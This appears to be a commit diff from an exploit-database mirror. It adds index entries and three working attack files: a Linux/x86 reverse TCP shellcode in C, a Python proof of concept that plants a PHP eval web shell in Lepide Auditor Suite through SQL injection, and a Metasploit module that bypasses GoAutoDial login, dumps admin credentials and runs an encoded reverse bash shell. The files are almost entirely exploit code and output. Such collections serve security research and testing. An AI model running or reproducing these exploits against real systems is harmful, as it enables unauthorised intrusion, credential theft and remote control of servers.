40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@ -16310,6 +16312,7 @@ id,file,description,date,author,platform,type,port
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0

Can't render this file because it is too large.

93
platforms/lin_x86/shellcode/42295.c Executable file
View file

@ -0,0 +1,93 @@
/*
Tiny Shell Reverse TCP Shellcode - C Language
Linux/x86
Written in 2013 by Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This source is licensed under the Creative Commons
Attribution-ShareAlike 3.0 Brazil License.
To view a copy of this license, visit
http://creativecommons.org/licenses/by-sa/3.0/
You are free:
to Share - to copy, distribute and transmit the work
to Remix - to adapt the work
to make commercial use of the work
Under the following conditions:
Attribution - You must attribute the work in the manner
specified by the author or licensor (but
not in any way that suggests that they
endorse you or your use of the work).
Share Alike - If you alter, transform, or build upon
this work, you may distribute the
resulting work only under the same or
similar license to this one.
*/
/*
tiny_shell_reverse_tcp_shellcode
* 67 bytes
* null-free if the IP and port are
# gcc -m32 -fno-stack-protector -z execstack tiny_shell_reverse_tcp_shellcode.c -o tiny_shell_reverse_tcp_shellcode
Testing
# nc -l 127.1.1.1 11111
# ./tiny_shell_reverse_tcp_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
"\x02\x89\xe1\xcd\x80\x59\x93\xb0\x3f\xcd"
"\x80\x49\x79\xf9\xb0\x66\x68\x7f\x01\x01"
"\x01\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1"
"\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x31\xc9\xcd\x80";
main ()
{
// When the Port contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(code));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Setting the IP
"movl $0x0101017f, (code+27)\n\t"
// Setting the port
"movw $0x672b, (code+33)\n\t"
// Calling the shellcode
"call code");
}

195
platforms/php/remote/42297.py Executable file
View file

@ -0,0 +1,195 @@
#!/usr/bin/python
"""
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/
Summary:
========
The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.
Additional code:
================
When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code:
root@kali:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys
if len(sys.argv) < 3:
print "(+) usage: %s <target> <attacker's server>" % sys.argv[0]
sys.exit(-1)
target = sys.argv[1]
server = sys.argv[2]
s = requests.Session()
print "(+) sending auth bypass"
s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False)
print "(+) sending code execution request"
s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'2@3','id':'6'})
Example:
========
root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016
(+) waiting for the target...
(+) connected by ('172.16.175.174', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.174', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();
In another console:
root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
"""
import struct
import socket
from thread import start_new_thread
import struct
LOGIN = 601
COLUMN = 604
FILENAME = 603
VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = "_SUCCESS_"
def get_string(conn):
size = struct.unpack(">i", conn.recv(4))[0]
data = conn.recv(size).decode("utf-16")
conn.send(struct.pack(">i", VALID))
return data
def send_string(conn, string):
size = len(string.encode("utf-16-le"))
conn.send(struct.pack(">i", size))
conn.send(string.encode("utf-16-le"))
return struct.unpack(">i", conn.recv(4))[0]
def send_tag(conn, tag):
conn.send(struct.pack(">i", TAGR))
conn.send(struct.pack(">i", tag))
return struct.unpack(">i", conn.recv(4))[0]
def send_file(conn, filedata):
if send_tag(conn, FILEN) == 2:
print "(+) successfully sent tag"
# send length of file
conn.send(struct.pack(">i", len(filedata.encode("utf-16-le"))))
# send the malicious payload
conn.send(filedata.encode("utf-16-le"))
if struct.unpack(">i", conn.recv(4))[0] == 2:
print "(+) successfully sent file!"
if send_tag(conn, VALID) == 2:
return True
return False
def client_thread(conn):
"""
Let's put it this way, my mum's not proud of my code.
"""
while True:
data = conn.recv(4)
if data:
resp = struct.unpack(">i", data)[0]
if resp == 4:
code = conn.recv(resp)
resp = struct.unpack(">i", code)[0]
# stage 1
if resp == LOGIN:
print "(+) got a login request"
# send a VALID response back
conn.send(struct.pack(">i", VALID))
# now we expect to get the username and password
print "(+) got a username: %s" % get_string(conn)
print "(+) got a password: %s" % get_string(conn)
# now we try to send to send a success packet
print "(+) sending SUCCESS packet"
if send_string(conn, SUCCESS) == 2:
print "(+) send string successful"
# stage 2
elif resp == COLUMN:
print "(+) got a column request"
# send a VALID response back
conn.send(struct.pack(">i", VALID))
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
if send_string(conn, "foo-bar") == 2:
print "(+) send string successful"
# stage 3 - this is where the exploitation is
elif resp == FILENAME:
print "(+) got a filename request"
conn.send(struct.pack(">i", VALID))
# now we read back 3 strings...
print "(+) got http request daterange: %s" % get_string(conn)
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
# exploit!
if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):
print "(+) file sent successfully"
print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0])
break
conn.close()
HOST = '0.0.0.0'
PORT = 1056
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)
print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution"
print "by mr_me 2016\t\n"
print "(+) waiting for the target..."
while True:
# blocking call, waits to accept a connection
conn, addr = s.accept()
print '(+) connected by %s' % addr
start_new_thread(client_thread, (conn,))
s.close()

141
platforms/unix/remote/42296.rb Executable file
View file

@ -0,0 +1,141 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris McCurley', # Discovery & Metasploit module
],
'References' =>
[
['CVE', '2015-2843'],
['CVE', '2015-2845']
],
'Platform' => %w{unix},
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 21 2015'))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 443]),
OptBool.new('SSL', [false, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path', '/'])
])
end
def check
res = check_version()
if res and res.body =~ /1421902800/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
end
def check_version()
uri = target_uri.path
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'changelog.txt'),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity'
}
})
end
def sqli_auth_bypass()
uri = target_uri.path
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity'
},
'vars_post' => {
'user_name' => 'admin',
'user_pass' => '\'%20or%20\'1\'%3D\'1'
}
})
end
def sqli_admin_pass(cookies)
uri = target_uri.path
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity',
'Cookie' => cookies
}
})
end
#
# Run the actual exploit
#
def execute_command()
encoded = Rex::Text.encode_base64("#{payload.encoded}")
params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
uri = target_uri.path
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
'headers' => {
'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity',
'Cookie' => @cookie
}
})
end
def exploit()
print_status("#{rhost}:#{rport} - Trying SQL injection...")
res1 = sqli_auth_bypass()
if res1 && res1.code == 200
print_good('Authentication Bypass (SQLi) was successful')
else
print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
end
@cookie = res1.get_cookies
print_status("#{rhost}:#{rport} - Dumping admin password...")
res = sqli_admin_pass(@cookie)
if res
print_good(res.body)
else
print_error('Error: No creds returned, possible mitigations are in place.')
end
print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
execute_command()
end
end